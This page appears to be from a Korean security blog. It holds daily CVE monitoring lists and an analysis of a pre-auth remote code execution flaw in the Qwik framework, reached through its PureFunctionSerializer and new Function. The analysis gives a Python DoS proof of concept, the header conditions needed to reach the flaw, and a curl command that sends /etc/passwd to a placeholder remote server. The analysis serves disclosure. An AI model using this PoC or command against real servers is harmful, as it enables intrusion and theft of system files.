반응형

 

datetime subject id link
2023-03-15 01:00:03.629320 (SQL injection) CVE-2023-27074 https://cve.report/CVE-2023-27074
2023-03-15 01:00:03.629865 (Critical) CVE-2023-1398 https://cve.report/CVE-2023-1398
2023-03-15 01:00:03.630307 (PHP) CVE-2023-1397 https://cve.report/CVE-2023-1397
2023-03-15 01:00:03.630776 (PHP) CVE-2023-1396 https://cve.report/CVE-2023-1396
2023-03-15 01:00:03.631229 (PHP) CVE-2023-1395 https://cve.report/CVE-2023-1395
2023-03-15 01:00:03.631665 (MySQL, PHP, SQL injection, Critical) CVE-2023-1394 https://cve.report/CVE-2023-1394
2023-03-15 01:00:03.632155 (Critical) CVE-2023-1392 https://cve.report/CVE-2023-1392
2023-03-15 01:00:03.632568 (PHP) CVE-2023-1391 https://cve.report/CVE-2023-1391
2023-03-15 02:00:03.310142 (XSS) CVE-2023-27070 https://cve.report/CVE-2023-27070
2023-03-15 02:00:03.310566 (XSS) CVE-2023-27069 https://cve.report/CVE-2023-27069
2023-03-15 03:00:04.001083 (Remote Code Execution) CVE-2023-24913 https://cve.report/CVE-2023-24913
2023-03-15 03:00:04.002028 (Remote Code Execution) CVE-2023-24907 https://cve.report/CVE-2023-24907
2023-03-15 03:00:04.002765 (Remote Code Execution) CVE-2023-24872 https://cve.report/CVE-2023-24872
2023-03-15 03:00:04.003239 (Remote Code Execution) CVE-2023-24869 https://cve.report/CVE-2023-24869
2023-03-15 03:00:04.003687 (Remote Code Execution) CVE-2023-24867 https://cve.report/CVE-2023-24867
2023-03-15 03:00:04.004528 (Remote Code Execution) CVE-2023-24909 https://cve.report/CVE-2023-24909
2023-03-15 03:00:04.004984 (Remote Code Execution) CVE-2023-24908 https://cve.report/CVE-2023-24908
2023-03-15 03:00:04.005456 (Remote Code Execution) CVE-2023-24876 https://cve.report/CVE-2023-24876
2023-03-15 03:00:04.005888 (Remote Code Execution) CVE-2023-24871 https://cve.report/CVE-2023-24871
2023-03-15 03:00:04.006270 (Remote Code Execution) CVE-2023-24868 https://cve.report/CVE-2023-24868
2023-03-15 03:00:04.006999 (SQL injection) CVE-2023-25206 https://cve.report/CVE-2023-25206
2023-03-15 03:00:04.007473 (Remote Code Execution) CVE-2023-23416 https://cve.report/CVE-2023-23416
2023-03-15 03:00:04.007902 (Remote Code Execution) CVE-2023-23415 https://cve.report/CVE-2023-23415
2023-03-15 03:00:04.008284 (Remote Code Execution) CVE-2023-23414 https://cve.report/CVE-2023-23414
2023-03-15 03:00:04.008644 (Remote Code Execution) CVE-2023-23413 https://cve.report/CVE-2023-23413
2023-03-15 03:00:04.009174 (HTTP.sys) CVE-2023-23410 https://cve.report/CVE-2023-23410
2023-03-15 03:00:04.009589 (Azure) CVE-2023-23408 https://cve.report/CVE-2023-23408
2023-03-15 03:00:04.010008 (Remote Code Execution) CVE-2023-23407 https://cve.report/CVE-2023-23407
2023-03-15 03:00:04.010382 (Remote Code Execution) CVE-2023-23406 https://cve.report/CVE-2023-23406
2023-03-15 03:00:04.010783 (Remote Code Execution) CVE-2023-23405 https://cve.report/CVE-2023-23405
2023-03-15 03:00:04.011189 (Remote Code Execution) CVE-2023-23404 https://cve.report/CVE-2023-23404
2023-03-15 03:00:04.011549 (Remote Code Execution) CVE-2023-23403 https://cve.report/CVE-2023-23403
2023-03-15 03:00:04.011969 (Remote Code Execution) CVE-2023-23402 https://cve.report/CVE-2023-23402
2023-03-15 03:00:04.012334 (Remote Code Execution) CVE-2023-23401 https://cve.report/CVE-2023-23401
2023-03-15 03:00:04.012688 (Remote Code Execution) CVE-2023-23400 https://cve.report/CVE-2023-23400
2023-03-15 03:00:04.013109 (Remote Code Execution) CVE-2023-23399 https://cve.report/CVE-2023-23399
2023-03-15 03:00:04.013773 (Remote Code Execution) CVE-2023-23392 https://cve.report/CVE-2023-23392
2023-03-15 03:00:04.014393 (Remote Code Execution) CVE-2023-21708 https://cve.report/CVE-2023-21708
2023-03-15 04:00:04.620937 (GraphQL) CVE-2023-27588 https://cve.report/CVE-2023-27588
2023-03-15 06:00:06.518784 (Command Injection, PHP) CVE-2023-28343 https://cve.report/CVE-2023-28343
2023-03-15 12:00:06.775986 (Remote Attack, PHP) CVE-2023-26511 https://cve.report/CVE-2023-26511
2023-03-15 12:00:06.776503 (File Upload) CVE-2023-26262 https://cve.report/CVE-2023-26262
2023-03-15 13:00:04.773870 (File Upload) CVE-2023-27757 https://cve.report/CVE-2023-27757
2023-03-15 15:00:04.972524 (PHP, File Upload) CVE-2023-27235 https://cve.report/CVE-2023-27235
2023-03-15 16:00:06.079322 (Command Injection) CVE-2023-27240 https://cve.report/CVE-2023-27240
2023-03-15 18:00:05.173922 (PHP, SQL injection, Critical) CVE-2023-1407 https://cve.report/CVE-2023-1407
2023-03-15 21:00:07.066053 (WordPress, Wordpress Plugin) CVE-2023-25708 https://cve.report/CVE-2023-25708
2023-03-15 22:00:04.554644 (XSS) CVE-2023-0322 https://cve.report/CVE-2023-0322

 

반응형

'Hacking > CVE List' 카테고리의 다른 글

[CVE] 2023. 03. 17. MR(Monitoring Report)  (0) 2023.03.18
[CVE] 2023. 03. 16. MR(Monitoring Report)  (0) 2023.03.18
[CVE] 2023. 03. 13. MR(Monitoring Report)  (0) 2023.03.14
[CVE] 2023. 03. 11. MR(Monitoring Report)  (0) 2023.03.12
[CVE] 2023. 03. 10. MR(Monitoring Report)  (0) 2023.03.11
반응형

ref

https://cve.report/CVE-2023-1283

https://huntr.dev/bounties/63f1ff91-48f3-4886-a179-103f1ddd8ff8/

배경

NodeJS기반의 Framework인 Qwik(https://github.com/BuilderIO/qwik)을 사용하는 서비스에서 Qwik의 버전이 0.20.1 이하일 경우 Preauth Remote Command Execution 공격이 가능합니다.

분석

  • 분석은 취약한 버전인 0.20.1으로 진행
  • Qwik의 middleware request handler는 다음과 같은 순서로 설정
    • POST: securityMiddleware ⇒ pureServerFunction ⇒ fixTrailingSlash ⇒ renderQData
    • GET: fixTrailingSlash ⇒ renderQData
// packages/qwik-city/middleware/request-handler/resolve-request-handlers.ts
var resolveRequestHandlers = (serverPlugins, route, method, renderHandler) => {
  const routeLoaders = [];
  const routeActions = [];
  const requestHandlers = [];
  const isPageRoute = !!(route && isLastModulePageRoute(route[1]));

  if (serverPlugins) {
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      serverPlugins,
      isPageRoute,
      method
    );
  }
  if (route) {
    if (isPageRoute) {
      if (method === "POST") {
        requestHandlers.unshift(securityMiddleware);
        requestHandlers.push(pureServerFunction);
      }
      requestHandlers.push(fixTrailingSlash);
      requestHandlers.push(renderQData);
    }
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      route[1],
      isPageRoute,
      method
    );
    if (isPageRoute) {
      if (routeLoaders.length + actionsMiddleware.length > 0) {
        requestHandlers.push(actionsMiddleware(routeLoaders, routeActions));
      }
      requestHandlers.push(renderHandler);
    }
  }
  return requestHandlers;
};
  • securityMiddleware함수는 CSRF의 방지 목적으로 아래의 조건을 확인
    • request.headers.get(”origin”) == url.origin
function securityMiddleware({ url, request, error }) {
  const forbidden = request.headers.get("origin") !== url.origin;
  if (forbidden) {
    throw error(403, `Cross-site ${request.method} form submissions are forbidden`);
  }
}
  • pureServerFunction는 다음과 같은 조건을 통과할 경우 ev.parseBody 함수를 실행
  1. qfunc is defined in query
  2. X-QRL in header == qfunc in query
  3. Content-Type == application/qwik-json
async function pureServerFunction(ev) {
  const fn = ev.query.get(QFN_KEY); // var QFN_KEY = "qfunc";
  if (fn && ev.request.headers.get("X-QRL") === fn && ev.request.headers.get("Content-Type") === "application/qwik-json") {
    ev.exit();
    const qwikSerializer = ev[RequestEvQwikSerializer];
    const data = await ev.parseBody();
    if (Array.isArray(data)) {
      const [qrl, ...args] = data;
      if (isQrl(qrl) && qrl.getHash() === fn) {
        const result = await qrl.apply(ev, args);
        verifySerializable(qwikSerializer, result, qrl);
        ev.headers.set("Content-Type", "application/qwik-json");
        ev.send(200, await qwikSerializer._serializeData(result, true));
        return;
      }
    }
    throw ev.error(500, "Invalid request");
  }
}
  • SSR의 경우 DoS (poc)
import sys 
import requests 

host = sys.argv[1] 
headers = { "Origin": host, "X-QRL": "1", "Content-Type": "application/qwik-json" } 
response = requests.post(f'{host}/q-data.json?qfunc=1', headers=headers) 
print(response.text)
  • 위의 조건이 맞으면 ev.parseBody() 함수내 실행
function createRequestEvent(serverRequestEv, loadedRoute, requestHandlers, trailingSlash = true, basePathname = "/", qwikSerializer, resolved) {
	// skip
	parseBody: async () => {
      if (requestData !== void 0) {
        return requestData;
      }
      return requestData = parseRequest(requestEv.request, sharedMap, qwikSerializer);
    },
	// skip
}

// skip

var parseRequest = async (request, sharedMap, qwikSerializer) => {
  var _a2;
  const req = request.clone();
  const type = ((_a2 = request.headers.get("content-type")) == null ? void 0 : _a2.split(/[;,]/, 1)[0].trim()) ?? "";
  if (type === "application/x-www-form-urlencoded" || type === "multipart/form-data") {
    const formData = await req.formData();
    sharedMap.set(RequestEvSharedActionFormData, formData);
    return formToObj(formData);
  } else if (type === "application/json") {
    const data = await req.json();
    return data;
  } else if (type === "application/qwik-json") {
    return qwikSerializer._deserializeData(await req.text());
  }
  return void 0;
};
  • requestData가 undefined라면 parseRequest로 인자로 전달
  • 이때 content-type이 application/qwik-json이므로 qwikSerializer._deserializeData를 호출
// qwik/core.mjs
const _deserializeData = (data, element) => {
    const obj = JSON.parse(data);
    if (typeof obj !== 'object') {
        return null;
    }
    const { _objs, _entry } = obj;
    if (typeof _objs === 'undefined' || typeof _entry === 'undefined') {
        return null;
    }
    let doc = {};
    let containerState = {};
    if (element && isQwikElement(element)) {
        const containerEl = getWrappingContainer(element);
        if (containerEl) {
            containerState = _getContainerState(containerEl);
            doc = containerEl.ownerDocument;
        }
    }
    const parser = createParser(containerState, doc);
    reviveValues(_objs, parser);
    const getObject = (id) => _objs[strToInt(id)];
    for (const obj of _objs) {
        reviveNestedObjects(obj, getObject, parser);
    }
    return getObject(_entry);
};
  • 이 함수에서는 deserialize를 위한 Parser를 생성하고 reviveValue를 호출
  • Parser는 prepare, subs, fill 이 3가지 함수가 존재
const createParser = (containerState, doc) => {
    const fillMap = new Map();
    const subsMap = new Map();
    return {
        prepare(data) {
					// skip
        },
        subs(obj, subs) {
					// skip
        },
        fill(obj, getObject) {
					// skip
        },
    };
};
  • reviveValues 함수는 다음과 같이 _obj의 타입이 “string”이고 값이 “\u0001”이 아니라면 parser의 prepare함수를 호출
const reviveValues = (objs, parser) => {
    for (let i = 0; i < objs.length; i++) {
        const value = objs[i];
        if (isString(value)) {
            objs[i] = value === UNDEFINED_PREFIX ? undefined : parser.prepare(value); // UNDEFINED_PREFIX = "\\u0001"
        }
    }
  • prepare 함수에서는 _obj의 값 중 첫 Byte를 prefix값으로써 활용하고, 이 값과 맞는 serializers를 찾음
  • 일치하는 serializers가 존재한다면 _obj의 2번째 byte부터의 값을 첫 번째 인자로써 serializer의 prepare함수를 호출
prepare(data) {
    for (const s of serializers) {
        const prefix = s.prefix;
        if (data.startsWith(prefix)) {
            const value = s.prepare(data.slice(prefix.length), containerState, doc);
            if (s.fill) {
                fillMap.set(value, s);
            }
            if (s.subs) {
                subsMap.set(value, s);
            }
            return value;
        }
    }
    return data;
}
  • Serializers의 리스트는 다음과 같고 이들은 각각 정의된 prefix값을 보유
// // qwik/core.mjs
const serializers = [
    QRLSerializer,
    SignalSerializer,
    SignalWrapperSerializer,
    WatchSerializer,
    ResourceSerializer,
    URLSerializer,
    DateSerializer,
    RegexSerializer,
    ErrorSerializer,
    DocumentSerializer,
    ComponentSerializer,
    PureFunctionSerializer,
    NoFiniteNumberSerializer,
    URLSearchParamsSerializer,
    FormDataSerializer,
];
  • 이 중 PureFunctionSerializer를 참조
const PureFunctionSerializer = {
    prefix: '\\u0011',
    test: (obj) => typeof obj === 'function' && obj.__qwik_serializable__ !== undefined,
    serialize: (obj) => {
        return obj.toString();
    },
    prepare: (data) => {
        const fn = new Function('return ' + data)();
        fn.__qwik_serializable__ = true;
        return fn;
    },
    fill: undefined,
};
  • prefix는 \u0011이고 prepare함수는 인자값을 이용해 new Function 함수를 실행
  • 이때 원격으로 명령어 실행이 가능
    • exploit 비공개, @별도 연락 해주세요.
    • command
      • curl -F”a=@/etc/passwd” http://[remote_server]

패치 방법

반응형

'Hacking > CVE Report' 카테고리의 다른 글

[CVE-2023-1761] Code Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.12.  (0) 2023.04.19
[CVE-2022-47607]Usersnap <= 4.16 - Authenticated (Admin+) Stored Cross Site Scripting  (0) 2023.03.31
[CVE-2023-1308] Online Graduate Tracer System sql injection  (0) 2023.03.18
[CVE-2023-24657] pipipam v1.5 reflected cross-site scripting (XSS)  (0) 2023.03.16
[CVE-2023-1312] Certain versions of Pimcore/pimcore from Pimcore contain the following vulnerability  (0) 2023.03.11
반응형
datetime subject id link
2023-03-13 08:00:07.614784 (HashiCorp Vault) CVE-2023-24999 https://cve.report/CVE-2023-24999
2023-03-13 14:00:05.519906 (GitHub, SQL injection) CVE-2023-1361 https://cve.report/CVE-2023-1361
2023-03-13 14:00:05.520244 (GitHub) CVE-2023-1362 https://cve.report/CVE-2023-1362
2023-03-13 18:00:06.123354 (GitHub, Code Injection) CVE-2023-1367 https://cve.report/CVE-2023-1367
2023-03-13 18:00:06.123787 (PHP, SQL injection, Critical) CVE-2023-1365 https://cve.report/CVE-2023-1365
2023-03-13 18:00:06.124162 (PHP, SQL injection, Critical) CVE-2023-1364 https://cve.report/CVE-2023-1364
2023-03-13 19:00:03.812133 (PHP, SQL injection, Critical) CVE-2023-1368 https://cve.report/CVE-2023-1368
2023-03-13 19:00:03.812506 (PHP, SQL injection, Critical) CVE-2023-1366 https://cve.report/CVE-2023-1366
2023-03-13 22:00:04.108741 (Docker) CVE-2023-0629 https://cve.report/CVE-2023-0629
2023-03-13 22:00:04.109121 (Docker, Arbitrary Command) CVE-2023-0628 https://cve.report/CVE-2023-0628
2023-03-13 23:00:03.618408 (WordPress) CVE-2023-1374 https://cve.report/CVE-2023-1374
2023-03-13 23:00:03.618829 (WordPress) CVE-2023-1372 https://cve.report/CVE-2023-1372
반응형

'Hacking > CVE List' 카테고리의 다른 글

[CVE] 2023. 03. 16. MR(Monitoring Report)  (0) 2023.03.18
[CVE] 2023. 03. 15. MR(Monitoring Report)  (0) 2023.03.16
[CVE] 2023. 03. 11. MR(Monitoring Report)  (0) 2023.03.12
[CVE] 2023. 03. 10. MR(Monitoring Report)  (0) 2023.03.11
[CVE] 2023. 03. 09. MR(Monitoring Report)  (0) 2023.03.10

+ Recent posts

티스토리툴바